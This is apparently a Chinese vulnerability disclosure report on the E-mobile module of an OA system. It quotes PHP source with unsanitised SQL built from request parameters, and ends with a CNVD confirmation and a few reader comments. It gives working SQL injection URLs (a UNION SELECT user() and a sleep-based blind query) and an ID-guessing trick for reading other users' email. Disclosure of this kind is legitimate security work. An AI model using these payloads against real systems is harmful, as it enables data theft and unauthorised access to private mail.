2015-07-22: 细节已通知厂商并且等待厂商处理中 2015-07-24: 厂商已经确认,细节仅向厂商公开 2015-07-27: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2015-09-17: 细节向核心白帽子及相关领域专家公开 2015-09-27: 细节向普通白帽子公开 2015-10-07: 细节向实习白帽子公开 2015-10-22: 细节向公众公开
rt
看到 E-mobile/calendar_page.php
$mobilekey = $_REQUEST['mobilesessionkey']; $page = $_REQUEST['page']; $module = $_REQUEST['module']; $scope = $_REQUEST['scope']; $detailid = $_REQUEST['detailid']; $fromid = $_REQUEST['fromid']; $sessionstr = $_REQUEST['sessionkey']; $strexplode = explode( ",", $sessionstr ); $userid = $strexplode[1]; $calid = $detailid; $UserInfor = array( ); $UserInfor['user_id'] = $userid; $caleApi = new calendar( $UserInfor ); $cales = $caleApi->getCalendarInfo( "", "", "", $calid );
跟进getCalendarInfo函数
public function getCalendarInfo( $limit = 0, $start = 0, $date = "", $calid = "", $keyword = "", $order = "" ) { global $connection; $limit = 0 < $limit ? $limit : $this->default_limit; $start = 0 < $start ? $start : $this->default_start; $sql = "\r\n\t\t\t\tSELECT * FROM calendar \r\n\t\t\t\t WHERE 1 \r\n\t\t\t\t AND (\r\n\t\t\t\t USER_ID='".$this->userid."' \r\n\t\t\t\t OR \r\n\t\t\t\t SHARE_USER LIKE '%,".$this->userid.",%' \r\n\t\t\t\t OR \r\n\t\t\t\t LEFT(SHARE_USER,".strlen( $this->userid ).") = '".$this->userid."'\r\n\t\t\t\t)"; if ( $calid != "" ) { $sql .= " AND CAL_ID=".$calid." "; //注入 } if ( $date != "" ) { $sql .= " AND TO_DAYS(CAL_BEGIN)=TO_DAYS('".$date."')"; } if ( $keyword != "" ) { $sql .= " AND CAL_CONTENT like '%".$keyword."%'"; } if ( $order == "" ) { $sql .= "ORDER BY CAL_BEGIN DESC LIMIT ".$start.",".$limit.""; } else { $sql .= "ORDER BY ".$order." DESC LIMIT ".$start.",".$limit.""; } $rs = exequery( $connection, $sql ); $resultArray = array( ); while ( $row = mysql_fetch_array( $rs ) ) { $calData['USER_ID'] = $row['USER_ID']; $calData['CAL_ID'] = $row['CAL_ID']; $calData['USER_NAME'] = getusernamenew( $row['USER_ID'] ); $calData['CAL_CONTENT'] = $row['CAL_CONTENT']; $calData['CAL_LEVEL'] = $row['CAL_LEVEL']; $calData['CAL_TYPE'] = $row['CAL_TYPE']; $calData['CAL_BEGIN'] = $row['CAL_BEGIN']; $calData['CAL_END'] = $row['CAL_END']; $calData['CAL_WHILE_TYPE'] = $row['CAL_WHILE_TYPE']; $calData['CAL_EACH_WHEEL'] = $row['CAL_EACH_WHEEL']; $calData['CAL_STR_WEEK'] = $row['CAL_STR_WEEK']; array_push( $resultArray, $calData ); } return $resultArray; }
注入#2 E-mobile/diarymy_page.php
include_once( "inc/utility_all.php" ); include_once( "inc/conn.php" ); include_once( "api/diary.class.php" ); include_once( "E-mobile/func_all.php" ); $user_id = $_REQUEST['userid']; $start = $_REQUEST['start'] ? $_REQUEST['start'] : 0; $Diary = new diary( ); $SearchStr['start'] = $start; $SearchStr['limit'] = 10; $diaryinfor = $Diary->MobileShowAllDiary( $user_id, $SearchStr ); $diaryallcount = $Diary->GetMobileAllDiaryCount( $user_id, $SearchStr ); $diarycount = count( $diaryinfor );
跟进MobileShowAllDiary
public function MobileShowAllDiary( $userid, $SearchStr = "" ) { global $connection; $info = array( ); if ( $SearchStr['under'] != "" ) { $user_str = substr( $SearchStr['userstr'], 0, -1 ); if ( $userid == "admin" ) { $query = "SELECT * FROM diary WHERE USER_ID!='admin' AND USER_ID IN (".$user_str.")"; } else { $query = "SELECT * FROM diary WHERE USER_ID IN (".$user_str.")"; } } else { $query = "SELECT * FROM diary WHERE USER_ID='".$userid."'"; } if ( $SearchStr['content'] != "" ) { $query .= " AND CONTENT LIKE '%".$value."%'"; } if ( $SearchStr['diff'] == "PuisneDiary" ) { $query .= " AND DIA_TYPE='1'"; } $query .= " ORDER BY DIA_DATE DESC"; if ( $SearchStr['start'] !== "" ) { $query .= " LIMIT ".$SearchStr['start'].","; //注入 } if ( $SearchStr['limit'] != "" ) { $query .= $SearchStr['limit']; } $cursor = exequery( $connection, $query ); $I = 0; while ( $ROW = mysql_fetch_array( $cursor ) ) { $info[$I]['diary_id'] = $ROW['DIA_ID']; $info[$I]['person_id'] = $ROW['USER_ID']; $info[$I]['diary_date'] = $ROW['DIA_DATE']; $info[$I]['diary_type'] = $ROW['DIA_TYPE']; $info[$I]['diary_content'] = $ROW['CONTENT']; $info[$I]['diary_creatdate'] = $ROW['ADD_TIME']; $info[$I]['ATTACHMENT_ID'] = $ROW['ATTACHMENT_ID']; $info[$I]['ATTACHMENT_NAME'] = $ROW['ATTACHMENT_NAME']; $Reply = $ROW['DIA_ID']( $ROW['DIA_ID'] ); $info[$I]['Reply'] = $Reply; ++$I; } return $info; }
越权遍历邮件#3 E-mobile/email_page.php
include_once( "api/email.class.php" ); include_once( "inc/conn.php" ); include_once( "inc/utility_all.php" ); include_once( "E-mobile/func_all.php" ); $mobilekey = $_REQUEST['mobilesessionkey']; $page = $_REQUEST['page']; $module = $_REQUEST['module']; $scope = $_REQUEST['scope']; $detailid = $_REQUEST['detailid']; $fromid = $_REQUEST['fromid']; $sessionstr = $_REQUEST['sessionkey']; $strexplode = explode( ",", $sessionstr ); $userid = $strexplode[1]; $UserInfor = array( ); $UserInfor['user_id'] = $userid; $emailId = $detailid; $email = new email( $UserInfor ); $emailInfor = $email->getEmailById( $emailId, "" );
然后emailId可控,跟进getEmailById
public function getEmailById( $id, $box = "" ) { global $connection; $sql = " select * from email where email_id = '{$id}' "; $cursor = exequery( $connection, $sql ); $row = mysql_fetch_array( $cursor, MYSQL_ASSOC ); $inArray = array( $row ); $inArray = $this->replaceUserStr( "TO_ID", "TO_NAME", $inArray ); $inArray = $this->replaceUserStr( "TO_ID2", "TO_NAME2", $inArray ); $inArray = $this->replaceUserStr( "FROM_ID", "FROM_NAME", $inArray ); if ( $box == "" ) { $this->updateReadflag( $id ); } return $inArray[0]; }
查询邮件内容
http://**.**.**.**:8028/E-mobile/calendar_page.php?detailid=-5272 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,user(),NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL--
http://**.**.**.**:8028/E-mobile/diarymy_page.php?start=1,1 procedure analyse((select IF(MID(user(),1,1)=114, sleep(5),1)),1)
**.**.**.**:8082//E-mobile/email_page.php?detailid=7
**.**.**.**:8082//E-mobile/email_page.php?detailid=1
0.0
危害等级:高
漏洞Rank:11
确认时间:2015-07-24 14:26
CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。
暂无
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
shafa
前排出售牛肉包子
@%270x5c 1毛钱卖不卖
这个好
登录后才能发表评论,请先 登录 。
